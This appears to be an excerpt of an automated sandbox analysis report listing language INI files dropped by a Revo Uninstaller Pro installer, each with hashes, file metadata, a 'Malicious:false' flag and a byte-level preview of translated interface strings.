                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.9.?.(.M.&.@./.H.i.n.d.i.....W.e.b.L.a.n.g.=.H.I.N.....T.r.a.n.s.l.a.t.o.r.=.J...K.i.s.h.o.r.e. .R.e.d.d.y.,. .a.s.h.i.s.h. .s.h.a.r.m.a.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].........1.0.2. .=. .&.G...G.......1.0.3. .=. .5.?...2.M.*.....1.0.4. .=. ...(.....8.M...>.2.0.....1.0.5. .=. ...*...0.#.....1.0.6. .=. .9.....0. ...K.!.....1.0.7. .=. .8.B...@.....1.0.8. .=. .*.M.0.$.@.......1.0.9. .=. .5.?.5.0.#.....1.1.0. .=. .8.M.%.>.*.(.>. .0.&.M.&. ...0.G.......1.1.1. .=. .*.M.0.5.?.7.M...?. ...K. .9...>.(.G.....1.1.2. .=. .$.>...<.>. ...0.G.....1.1.3. .=. ...M./.>. ...*. .../.(.?.$. .*.M.0.5.?.7.M...?. ...K. .9...>.(.>. ...>.9.$.G. .9.H...?.....1.1.4. .=. ...M./.>. ...*. .../.(.?.$. .*.M.0.K...M.0.>... ...@. .8.M.%.>.*.(.>. .0.&.M.&.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (600), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):93810
                                                                                                                                                                          Entropy (8bit):3.5478965253929156
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:loeLuV/aGAVazqJfWUEOINf9Fp2EitEEdQnv6cEeSvi2dIn1VponVP3rMDv:wVcXJfWUCFFpcxEv9Wvi2WDpua
                                                                                                                                                                          MD5:7D31DBE80F1759C28FFA258946FEC92F
                                                                                                                                                                          SHA1:A010F11A8C3A495F126F4C9FDB7317ABB1986A17
                                                                                                                                                                          SHA-256:9F69A409CADA6A835370E3A457EE83470F895B60755EE0807F27276C5738FD35
                                                                                                                                                                          SHA-512:542D1D5CBAA93BF9368B653D9D56E69860EAA698C33293223BFBFD474EECA7E1482D7E795DFBFB407D670913F87DB3E0A87351970CC0A0DB76DAB43CAC1199B9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.H.r.v.a.t.s.k.i./.C.r.o.a.t.i.a.n. .....W.e.b.L.a.n.g.=.H.R.....T.r.a.n.s.l.a.t.o.r.=.H.a.s.a.n. .O.s.m.a.n.a.g.i.......C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...1...8.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .I.z.g.l.e.d.....1.0.3. .=. .P.o.s.t.a.v.k.e.....1.0.4. .=. .D.e.i.n.s.t.a.l.e.r.....1.0.5. .=. .A.l.a.t.i.....1.0.6. .=. .P.r.e.s.r.e.t.a.n.j.e.....1.0.7. .=. .P.o.p.i.s.....1.0.8. .=. .I.k.o.n.e.....1.0.9. .=. .D.e.t.a.l.j.i.....1.1.0. .=. .D.e.i.n.s.t.a.l.i.r.a.j.....1.1.1. .=. .U.k.l.o.n.i. .u.n.o.s.....1.1.2. .=. .O.s.v.j.e.~.i.....1.1.3. .=. .U.k.l.o.n.i.t.i. .o.z.n.a...e.n.i. .u.n.o.s.?.....1.1.4. .=. .D.e.i.n.s.t.a.l.i.r.a.t.i. .o.z.n.a...e.n.i. .p.r.o.g.r.a.m.?.....1.1.5. .=. .D.o.g.r.a.d.n.j.a.....1.1.6. .=. .P.o.m.o.......1.1.7. .=. .U.p.u.t.e...........
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (675), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):134684
                                                                                                                                                                          Entropy (8bit):3.6263066482370334
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:WuphjkIdd/DdEIK0maAmDwQPVC0fwodhjAMX+907+AjwVm+MV8iW8HjJkSADPUFj:huPUTmK
                                                                                                                                                                          MD5:9D502EA4D293E8CDD722B1CC120ACE31
                                                                                                                                                                          SHA1:004732BAADE360FB190885B26C8D0F477B89935D
                                                                                                                                                                          SHA-256:D362840E3245B77979D529C10C755E21AF193F0406BD850D813673E17D888A26
                                                                                                                                                                          SHA-512:29261C915860319189B31C72C581B33C1F4967C2D77B924A8FCD530930E8B2C418030FC55993A188E5EC956D75D3F91BE89F4E25C31FC4A9DA005FC6B6F134D7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.M.a.g.y.a.r./.H.u.n.g.a.r.i.a.n.....W.e.b.L.a.n.g.=.H.U.N.....T.r.a.n.s.l.a.t.o.r.=.D...b.r...n.t.e.i. .S...n.d.o.r. .-. .s.a.n.d.o.r...d.o.b.r.o.n.t.e.i.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .N...z.e.t.....1.0.3. .=. .B.e...l.l...t...s.o.k.....1.0.4. .=. .E.l.t...v.o.l...t.......1.0.5. .=. .E.s.z.k...z...k.....1.0.6. .=. .K.e.r.e.s.Q. .m...d.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.o.k.....1.0.9. .=. .R...s.z.l.e.t.e.k.....1.1.0. .=. .E.l.t...v.o.l...t...s.....1.1.1. .=. .B.e.j.e.g.y.z...s. .t...r.l...s.e.....1.1.2. .=. .F.r.i.s.s...t...s.....1.1.3. .=. .B.i.z.t.o.s. .b.e.n.n.e.,. .h.o.g.y. .t...r.l.i. .a. .k.i.j.e.l...l.t. .b.e.j.e.g.y.z...s.t.?.....1.1.4. .=. .B.i.z.t.o.s. .b.e.n.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (717), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):127392
                                                                                                                                                                          Entropy (8bit):3.4614005609864864
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:locWzmYvaewluEO21T4oOdCWKWdOvHLu1ab9YVU/yfIyN07kr5VRQ2BNi4ZVRENz:Yulu0hCdOvHqb95cB3k5k
                                                                                                                                                                          MD5:59F2A36A20215347BEB58ACB7CEABA53
                                                                                                                                                                          SHA1:40C01D8893E698F802095D8ED5CD6CC05A4B7A0B
                                                                                                                                                                          SHA-256:30388CC2C429EFB94253B926C64BE4D167C2F362DB09300AC4554520DF419C56
                                                                                                                                                                          SHA-512:DF87473B891803D14592C53E2EC5878DCD0391B51991D712BAE4F9E0B5F5C2819B510009448F8B516AE926BDF551B43DFD8F524B549D6476E5608F6C919E83A2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.B.a.h.a.s.a. .I.n.d.o.n.e.s.i.a./.I.n.d.o.n.e.s.i.a.n.....W.e.b.L.a.n.g.=.I.N.D.....T.r.a.n.s.l.a.t.o.r.=.P.u.r.w.o. .A.d.i. .N.u.g.r.o.h.o.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .L.i.h.a.t.....1.0.3. .=. .P.i.l.i.h.a.n.....1.0.4. .=. .P.e.n.g.h.a.p.u.s.....1.0.5. .=. .P.e.r.a.l.a.t.a.n.....1.0.6. .=. .M.o.d.e. .P.e.m.b.u.r.u.....1.0.7. .=. .D.a.f.t.a.r.....1.0.8. .=. .I.k.o.n.....1.0.9. .=. .R.i.n.c.i.a.n.....1.1.0. .=. .H.a.p.u.s.....1.1.1. .=. .H.a.p.u.s. .C.a.t.a.t.a.n.....1.1.2. .=. .S.e.g.a.r.k.a.n.....1.1.3. .=. .A.p.a.k.a.h. .a.n.d.a. .y.a.k.i.n. .i.n.g.i.n. .m.e.n.g.h.a.p.u.s. .c.a.t.a.t.a.n. .t.e.r.p.i.l.i.h.?.....1.1.4. .=. .A.p.a.k.a.h. .a.n.d.a. .y.a.k.i.n. .i.n.g.i.n. .m.e.n.g.h.a.p.u.s. .p.r.o.g.r.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (662), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):142466
                                                                                                                                                                          Entropy (8bit):3.396814543249537
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:eNJzHR1iVUz5T/mHE+fs1eEDVUcdPNjVlKEhL98UAueg8fC:kJzHTX5TeHE+f+eEDVNdPhVlKwZ8dgaC
                                                                                                                                                                          MD5:71BAA3C894A26E3C285262E34960F6C8
                                                                                                                                                                          SHA1:33509E1740D10D7FD813F353BDE5BC1DB4A699B0
                                                                                                                                                                          SHA-256:9B287843DA49B5975FEA024EA51BD68AA8B03A9946F3CF043201D524033F77DF
                                                                                                                                                                          SHA-512:A7E40761892BC379CE907BA55E3AA4E9AE0DA50454DB8D2BBC89467E5F66A031B740B654362AEA2189F8DEC5AD759456890B991719886D75D74DFAB508929F1B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.I.t.a.l.i.a.n.o./.I.t.a.l.i.a.n.....W.e.b.L.a.n.g.=.I.T.A.....T.r.a.n.s.l.a.t.o.r.=.M.a.r.i.a. .G.r.a.z.i.a. .B.a.r.b.i.e.r.i.,.M.a.s.s.i.m.o. .C.a.s.t.i.g.l.i.a.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.u.a.l.i.z.z.a.z.i.o.n.e.....1.0.3. .=. .O.p.z.i.o.n.i.....1.0.4. .=. .D.i.s.i.n.s.t.a.l.l.a.t.o.r.e.....1.0.5. .=. .S.t.r.u.m.e.n.t.i.....1.0.6. .=. .M.o.d.o. .m.i.r.i.n.o.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.c.o.n.e.....1.0.9. .=. .D.e.t.t.a.g.l.i.....1.1.0. .=. .D.i.s.i.n.s.t.a.l.l.a.....1.1.1. .=. .R.i.m.u.o.v.i. .v.o.c.e.....1.1.2. .=. .A.g.g.i.o.r.n.a.....1.1.3. .=. .S.i.c.u.r.o. .d.i. .v.o.l.e.r. .r.i.m.u.o.v.e.r.e. .l.a. .v.o.c.e. .s.e.l.e.z.i.o.n.a.t.a.?.....1.1.4. .=. .S.i.c.u.r.o. .d.i. .v.o.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):77404
                                                                                                                                                                          Entropy (8bit):5.228699203430081
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:84p2dHm7WVI3NNRdZKxCJNFYsWXrQ2YjnW9Xq3iQSa0qqMyeqXLRZEvAcrNcV5Gx:j2dHgWWfRdZbNF/WXrQ2YLW963iQSa0+
                                                                                                                                                                          MD5:040C2D8EBC17DACAF936A472088110A4
                                                                                                                                                                          SHA1:A8CA607E209452B7886F6E9CBEAA7253623496FE
                                                                                                                                                                          SHA-256:2F2DC8C8727EC6C1E4898E150A8CD962F394C37ECEF6838CE0807CE8363A9358
                                                                                                                                                                          SHA-512:3AD8367F4F2A52BD6B975AFDED53BDEC5A25439DADB81DFC78A67626F7250C284A6BA5AF73F489FD94734CC178D9F3217D34F4C73A9A6109636CA09BC100DB59
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=..e,g../.J.a.p.a.n.e.s.e.....W.e.b.L.a.n.g.=.J.P.N.....T.r.a.n.s.l.a.t.o.r.=.T.i.l.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .h.:y-..[....1.0.3. .=. ..0.0.0.0.0....1.0.4. .=. ..0.0.0.0.0.0.0.0....1.0.5. .=. ..0.0.0....1.0.6. .=. ..0.0.0.0.0.0.0....1.0.7. .=. ..N......1.0.8. .=. ..0.0.0.0....1.0.9. .=. .s.0}....1.1.0. .=. ..0.0.0.0.0.0.0.0....1.1.1. .=. ..0.0.0.0.0d..S....1.1.2. .=. ..f.e....1.1.3. .=. .x..bU0.0_0.0.0.0.0.0,gS_k0JRd.W0~0Y0K0?.....1.1.4. .=. .x..bU0.0_0.0.0.0.0.0.0,gS_k0.0.0.0.0.0.0.0.0W0~0Y0K0?.....1.1.5. .=. ..0.0.0.0.0.0....1.1.6. .=. ..0.0.0....1.1.7. .=. ..0.0.0.0.0.0..........1.1.8. .=. ..0.0.0.0.0.0..........1.1.9. .=. ..0.0.0.0.0.`1X..........1.2.0. .=. ..{.t..)jP.g0.0.0.0.0W0f0O0`0U0D0!.....1.2.1.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (412), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):77282
                                                                                                                                                                          Entropy (8bit):5.344405966542523
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:lohuLfu+X83GXjDzy48AISFuPm553g6R6JCezMzd4ytJ7r2BtEaClqc:ACfu+X83GXjPyx9Sn53g6R6JO7EMlqc
                                                                                                                                                                          MD5:9B08D7938D6B83218D43FA1F884D821A
                                                                                                                                                                          SHA1:D8B4B40502954521DDA2955C2CC0919B80CB8188
                                                                                                                                                                          SHA-256:88B117C0F2A37A375F86EF3C686288C954A88F4647230DE58C47D7532FFC7115
                                                                                                                                                                          SHA-512:4E471F55D3D65D196202415071797E855AA2A93B26D25128686D5A68BF04A9D0307D4C3B22179A3B55384918819524B1ECD46CAD9DE0C9C406529A82F41764CE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.\.m... ./. .K.o.r.e.a.n.....W.e.b.L.a.n.g.=.K.O.R.....T.r.a.n.s.l.a.t.o.r.=.J.a.e.H.y.u.n.g. .L.e.e. ./. .k.o.l.a.n.p.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...0.....1.0.3. .=. .5.X.....1.0.4. .=. ...p.0.....1.0.5. .=. ..l.....1.0.6. .=. ...0.......1.0.7. .=. .........1.0.8. .=. .D.t.X.....1.0.9. .=. .8... .........1.1.0. .=. ...\..... ...p.....1.1.1. .=. . ... .m.. ...p.....1.1.2. .=. .... ........1.1.3. .=. ....\. . ...\. .m..D. ...p.X.......L.?.....1.1.4. .=. ....\. . ...\. ...\.....D. ...p.X.......L.?.....1.1.5. .=. ...p.t......1.1.6. .=. .........1.1.7. .=. .... ..l. ...............1.1.8. .=. .H..t.............1.1.9. .=. .... ...............1.2.0. .=. ...X.. .........
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (531), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):69202
                                                                                                                                                                          Entropy (8bit):3.580198978681514
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:lojEDwthZmIwWc3bBtbD0ANX8If2WDafbdoV4XL26VZiIJBPbdBnXPaei7:s+hX18bBRD2
                                                                                                                                                                          MD5:2CE2A032457DDD8E1DC8868CC1C75A48
                                                                                                                                                                          SHA1:9229850C65FA487A26C9FE4DDA51C302533C195B
                                                                                                                                                                          SHA-256:0AF0D6E4657ED06CCD5AE0FB5E8E3BFBE0CE3950757F1AC109C1104DB051F98F
                                                                                                                                                                          SHA-512:3D1EBA1104A15189EDC30033D7EA011E9F2EB623941464238506F487D58CBA87A05B3CC2E8860FF5CCAB0CD637796AF49A132CBF21C7B3E2F2F6004BE6B0935C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.K.u.r.d.../.K.u.r.d.i.s.h.....W.e.b.L.a.n.g.=.K.U.R.....T.r.a.n.s.l.a.t.o.r.=.O.c.c.o. .M.a.h.a.b.a.d. .-. .o.c.c.o.7.4.@.h.o.t.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.2...5...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .D...m.e.n.....1.0.3. .=. .E.y.a.r.....1.0.4. .=. .U.n.i.n.s.t.a.l.l.e.r./.R.a.k.e.r.....1.0.5. .=. .A.m...r.....1.0.6. .=. .M.o.d.a. .N.......r.v.a.n.....1.0.7. .=. .L...s.t.e.....1.0.8. .=. .S...m.g.e.....1.0.9. .=. .D.e.t.a.y.....1.1.0. .=. .R.a.k.e.....1.1.1. .=. .Q.e.y.d... .R.a.k.e.....1.1.2. .=. .N... .B.i.k.e.....1.1.3. .=. .Q.e.y.d.a. .h.i.l.b.i.j.a.r.t... .w.e.r.e. .r.a.k.i.r.i.n.?.....1.1.4. .=. .B.e.r.n.a.m.e.y.a. .h.i.l.b.i.j.a.r.t... .w.e.r.e. .r.a.k.i.r.i.n.?.....1.1.5. .=. .R.o.j.a.n.e. .B.i.k.e.....1.1.6. .=. .A.l...
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (484), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):110288
                                                                                                                                                                          Entropy (8bit):3.9383295798946234
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:4seY/kLsTdMxIxQazH+KM5N59cSvvbbuig36p7Ne8hVudV1vNWM3ktFRDlxD8ygB:jeY/6xIxQazH+KM5N59cSvvbbuig3SuD
                                                                                                                                                                          MD5:B78738D6771FCA62516F8EB15C9460DB
                                                                                                                                                                          SHA1:69D6F4193A9CD53776162E491BA0C78CDAE77966
                                                                                                                                                                          SHA-256:A93CFABCDCC7D9876EBD2BD3775E77EE4B194870A981588F747BC01F7EC86FB5
                                                                                                                                                                          SHA-512:5CCE82FCA675751A9E22C0F15C938C237B15E63422DE436A6E448D34F8FB8819E9F41E4F01B5117983F615B38029363FC7B1DBC58B7B9268BC1B54294A803652
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=...0.:.5.4.>.=.A.:.8./.M.a.c.e.d.o.n.i.a.n.....W.e.b.L.a.n.g.=.M.K.D.....T.r.a.n.s.l.a.t.o.r.=.0.1. .V.l.a.t.c.e.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...7.3.;.5.4.....1.0.3. .=. ...?.F.8.8.....1.0.4. .=. ...5.8.=.A.B.0.;.5.@.....1.0.5. .=. ...;.0.B.:.8.....1.0.6. .=. ...>.4. .=.0. .1.0.@.0.Z.5.....1.0.7. .=. ...8.A.B.0.....1.0.8. .=. ...:.>.=.8.....1.0.9. .=. ...5.B.0.;.8.....1.1.0. .=. ...5.8.=.A.B.0.;.8.@.0.X.....1.1.1. .=. ...B.A.B.@.0.=.8. .3.>. .2.=.5.A.>.B.....1.1.2. .=. ...A.2.5.6.8.....1.1.3. .=. ...0.;.8. .A.B.5. .A.8.3.C.@.=.8. .4.5.:.0. .A.0.:.0.B.5. .4.0. .3.>. .B.@.3.=.5.B.5. .A.5.;.5.:.B.8.@.0.=.8.>.B. .2.=.5.A.?.....1.1.4. .=. ...0.;.8. .A.B.5. .A.8.3.C.@.=.8. .4.5.:.0. .A.0.:.0.B.5. .4.0. .3.>. .4.5.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (435), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):116584
                                                                                                                                                                          Entropy (8bit):3.4724567340731216
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:FW7jQkbLU+miBrdji6E+X4teDexIa073UCYIRWq13rSsVLYU4:Mbi
                                                                                                                                                                          MD5:D5A24F2D5AE12A843240E354EB26BCD6
                                                                                                                                                                          SHA1:A2BD707D7195CD1A3163D4F33750457F5D889DE9
                                                                                                                                                                          SHA-256:FF3F554C0F9249C1F76E7E9B2F4CA8EDE2CA42459BE3BE37A483DEC10D64F73E
                                                                                                                                                                          SHA-512:533F1FF1D5414A1941C408BB29B855B2D1851CE05C5EFEA24B9D4AFA7232933CC08BB67DFCCBA4F4B3C0798F934AC4452730A1164C17ECAE0C6C8BE69D0ABCF4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .N.o.r.s.k./.N.o.r.w.e.g.i.a.n.....W.e.b.L.a.n.g.=.N.O.R.....T.r.a.n.s.l.a.t.o.r.=.P.a.a.l. .R.o.n.n.i.n.g.e.n.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.....1.0.3. .=. .A.l.t.e.r.n.a.t.i.v.....1.0.4. .=. .A.v.i.n.s.t.a.l.l.e.r.e.r.....1.0.5. .=. .V.e.r.k.t...y.....1.0.6. .=. .J.a.k.t.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.k.o.n.e.r.....1.0.9. .=. .D.e.t.a.l.j.e.r.....1.1.0. .=. .A.v.i.n.s.t.a.l.l.e.r.e.....1.1.1. .=. .T.a. .b.o.r.t. .p.o.s.t.....1.1.2. .=. .O.p.p.d.a.t.e.r.e. .p.r.o.g.r.a.m.l.i.s.t.e.n.....1.1.3. .=. .V.i.l. .d.u. .v.i.r.k.e.l.i.g. .t.a. .b.o.r.t. .V.a.l.g.t. .p.o.s.t.?.....1.1.4. .=. .V.i.l. .d.u. .v.i.r.k.e.l.i.g. .t.a. .b.o.r.t. .V.a.l.g.t. .p.r.o.g.r.a.m.?.....1.1.5. .=. .O.p.p.d.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (1970), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):121434
                                                                                                                                                                          Entropy (8bit):3.814439127324583
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:loaWsQeVjoYi8L0q1NzZ08iZnDt9+b311fUiXMkISCNXLz3UhUp:cr4oYi8L0q1c8MDv+bl1fhyBz3so
                                                                                                                                                                          MD5:3C10E3A4E879163DC1AC916D3AAE316C
                                                                                                                                                                          SHA1:3F5D75D837EF2490AB6C5B035855766443DF5A4B
                                                                                                                                                                          SHA-256:7173C74A1CD8F6AE7AEABF34A4AFA18DA73D1E595850C06953BF70CA8326F3D0
                                                                                                                                                                          SHA-512:14538BDFE3DFE2EE7DA9FF84E7E13B591732F0161622C203DB487009A6CB23E2760BEC5459B5FAD620184F2CC19F09D5865DF8F03C51BFD44A18C4CEE73AE03C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.A.'.1.3.J./.P.e.r.s.i.a.n.....W.e.b.L.a.n.g.=.F.A.R.....T.r.a.n.s.l.a.t.o.r.=.E.G.F./.3. .9.(./.'.D.1.6.'. .4.A.'..... .|. .E.d.i.t.e.d. .B.y. .A.l.i.r.e.z.a. .K.a.l.a.l.i.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....V.e.r.s.i.o.n.=.4...0...5.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2.=.F.E.'.J.4.....1.0.3.=.*.F.8.J.E.'.*.....1.0.4.=.-.0.A. ...F.F./.G.....1.0.5.=.'.(.2.'.1.G.'.....1.0.6.=.-.'.D.*.\.n. .4...'.1...J.....1.0.7.=.A.G.1.3.*.....1.0.8.=.4.E.'.J.D.....1.0.9.=.,.2.&.J.'.*.....1.1.0.=.-.0.A. .(.1.F.'.E.G.....1.1.1.=.-.0.A. .H.1.H./.J. .....1.1.2.=.*.'.2.G. .3.'.2.J.....1.1.3.=.".J.'. .E.7.E.&.F. .(.G. .-.0.A. .H.1.H./.J. .'.F.*...'.(. .4./.G. .G.3.*.J./. .......1.1.4.=.".J.'. .E.7.E.&.F. .(.G. ...1.H.,. .(.1.F.'.E.G. .(.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (512), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):125354
                                                                                                                                                                          Entropy (8bit):3.6916938529521914
